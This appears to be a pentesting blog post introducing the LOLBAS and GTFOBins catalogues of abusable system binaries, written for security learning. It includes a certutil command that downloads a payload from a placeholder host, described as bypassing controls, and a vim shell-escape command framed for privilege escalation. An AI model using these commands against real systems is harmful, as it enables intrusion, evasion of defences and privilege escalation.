What is LOLBAS?

LOLBAS (Living Off the Land Binaries and Scripts) is a project that curates a list of executables, scripts, and libraries commonly present on Windows systems. The concept of “Living Off the Land” refers to using tools already available on the target system to accomplish malicious actions without raising red flags with security software. Because these binaries are signed by Microsoft and are part of the operating system, they are often trusted by antivirus solutions and endpoint detection systems.

Typical Use Cases in Pentesting:

  • Privilege Escalation: Using Windows binaries to execute commands or access data that would otherwise be restricted.
  • Data Exfiltration: Tools like certutil.exe can be used to download or transfer files without needing to install additional software.
  • Command Execution: Some Windows executables can be leveraged to execute scripts or arbitrary commands.
  • Evasion of Security Solutions: Since these binaries are native and signed by Microsoft, they often evade traditional antivirus detections.

Example: One commonly exploited binary is certutil.exe, which is designed to handle certificates but can be repurposed for file downloads.

certutil -urlcache -split -f http://example.com/payload.exe payload.exe

In this command, certutil downloads a file from a remote URL, bypassing many basic security controls that might block other download utilities.

Accessing the LOLBAS Database: You can find a complete, regularly updated list of exploitable Windows binaries on the official LOLBAS GitHub repository: https://github.com/LOLBAS-Project/LOLBAS

This repository provides detailed information on each binary, including usage examples and techniques for exploitation.


What is GTFOBins?

GTFOBins is a similar project, but it focuses on binaries commonly found in Unix-like systems (Linux, macOS, etc.). GTFOBins catalogues standard system executables that can be exploited for actions such as command execution, privilege escalation, and data exfiltration. Since these binaries are often available on even the most locked-down systems, they are invaluable for pentesters working in Unix environments.

Typical Use Cases in Pentesting:

  • Privilege Escalation: Some binaries can be run with sudo without a password, enabling access to restricted files or elevated privileges.
  • Arbitrary Command Execution: Utilities like awk, vim, and less can be exploited to spawn a shell and run commands.
  • File Reading: GTFOBins includes commands that can read files with restricted permissions.
  • Sandbox Escape: In containerized environments, these binaries might allow attackers to escape from the sandbox and access the host system.

Example: The text editor vim can be used to launch a shell from within the editor interface.

vim -c ':!sh'

This command opens a shell from within vim, which can be useful if vim has elevated privileges on the system.

Accessing the GTFOBins Database: The official GTFOBins website provides a searchable database of Unix executables and their potential exploit paths. Each entry includes examples of how to leverage the binary for privilege escalation, command execution, and other tasks: https://gtfobins.github.io/


Why Pentesters Use LOLBAS and GTFOBins

For penetration testers, the appeal of LOLBAS and GTFOBins lies in their ability to:

  • Avoid Detection: Since these tools are native to the system and often signed by trusted sources (e.g., Microsoft on Windows), they are less likely to trigger alerts from security solutions.
  • Bypass Restrictions: On locked-down systems where custom tools can’t be installed, LOLBAS and GTFOBins provide a way to use what’s already there.
  • Escalate Privileges: Many entries in both projects can be used to escalate privileges if improperly configured permissions allow them to be executed with higher privileges.
  • Demonstrate Real-World Attack Vectors: Using LOLBAS and GTFOBins helps simulate realistic attack scenarios that rely on misconfigurations and insecure defaults.

Ressources

For more details and to explore specific commands, visit the official LOLBAS and GTFOBins resources:


0 Comments

Leave a Reply

Avatar placeholder

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.